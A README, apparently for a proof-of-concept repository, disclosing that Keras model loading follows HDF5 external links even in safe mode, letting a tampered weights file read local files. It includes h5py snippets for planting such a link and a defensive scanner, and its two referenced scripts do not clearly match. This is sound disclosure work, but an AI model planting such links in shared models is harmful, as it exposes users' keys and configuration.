
This repo is a proof of concept for a vulnerability I found in how the modern .keras format handles weights. Even with safe_mode=True, the model loader lets the HDF5 driver resolve external links. This means a malicious model can "point" at files on the local system (like /etc/hostname) and read them into the model session.
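To see the underlying mechanism, here is a minimal sketch of an HDF5 external link using h5py. The file names are illustrative; the point is that the linked entry transparently reads a *different* file when dereferenced:

```python
import h5py

# A "target" file standing in for some other file on the host.
with h5py.File("secret.h5", "w") as f:
    f.create_dataset("data", data=[1, 2, 3])

# A weights-like file whose entry is an external link, not real data.
with h5py.File("weights.h5", "w") as f:
    f["weights"] = h5py.ExternalLink("secret.h5", "/data")

# Reading the linked entry pulls in the OTHER file's contents.
with h5py.File("weights.h5", "r") as f:
    print(f["weights"][:].tolist())  # → [1, 2, 3], from secret.h5
```

The link stores only a filename and an object path, so nothing looks wrong until a loader actually dereferences it.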

Setup

The exploit_model.keras file is actually a zip. Inside, the model.weights.h5 has been modified to include an HDF5 external link. When Keras loads the weights, it follows that link out to files on the host. This bypasses the Python-level safety checks because the "leak" happens lower down, in the HDF5 library itself.
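A weights file can be tampered with using nothing but h5py. A minimal sketch follows; the entry name `leaked` and the target path are illustrative placeholders, not the exact layout Keras writes:

```python
import h5py

# Sketch: plant an HDF5 external link inside a weights file.
# The link is pure metadata -- nothing is read from the target
# until a loader dereferences the entry.
with h5py.File("model.weights.h5", "a") as f:
    f["leaked"] = h5py.ExternalLink("/etc/target.h5", "/data")
```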

Procedure

  1. Grab the code3.py file from this repo.
  2. Run tcn2.py from this same repo (or a similar trigger adjusted to your setup/test case).

Impact

This is a big deal for supply-chain security. If a developer downloads a "pre-trained" model, that model could theoretically read their env vars, config files, or SSH keys simply by being loaded. It breaks the trust people place in the new .keras format as a safe serialization format.
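One practical defense is to audit a weights file for external links *before* loading it. The sketch below (my own illustration, not part of this repo) walks the HDF5 group tree with h5py and reports every external link without dereferencing any of them:

```python
import h5py

def find_external_links(path):
    """Return (internal_path, target_file) for every HDF5 external
    link in the file, without resolving any of the links."""
    hits = []

    def scan(group, prefix=""):
        for name in group:
            # getlink=True returns the link object itself,
            # so the target file is never opened.
            link = group.get(name, getlink=True)
            full = f"{prefix}/{name}"
            if isinstance(link, h5py.ExternalLink):
                hits.append((full, link.filename))
            elif isinstance(link, h5py.HardLink) and isinstance(
                group[name], h5py.Group
            ):
                scan(group[name], full)

    with h5py.File(path, "r") as f:
        scan(f)
    return hits

# Demo: a weights file with one planted link gets flagged.
with h5py.File("suspect.weights.h5", "w") as f:
    grp = f.create_group("vars")
    grp["kernel"] = h5py.ExternalLink("/some/other/file.h5", "/data")

print(find_external_links("suspect.weights.h5"))
# → [('/vars/kernel', '/some/other/file.h5')]
```

A clean weights file should produce an empty list; any hit means the file will reach outside itself when loaded.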

Check the exploit_model.keras file
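You can confirm the archive layout yourself, since a .keras file is a plain zip. The sketch below builds a stand-in archive just to show the structure (the real exploit_model.keras in this repo is the one carrying the tampered weights file):

```python
import zipfile

# Build a stand-in .keras archive to illustrate the layout.
# The JSON bodies and the empty weights entry are placeholders.
with zipfile.ZipFile("demo_model.keras", "w") as z:
    z.writestr("config.json", "{}")
    z.writestr("metadata.json", "{}")
    z.writestr("model.weights.h5", b"")  # placeholder for the HDF5 payload

# Listing the entries shows model.weights.h5 -- the file to inspect.
with zipfile.ZipFile("demo_model.keras") as z:
    print(z.namelist())
```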

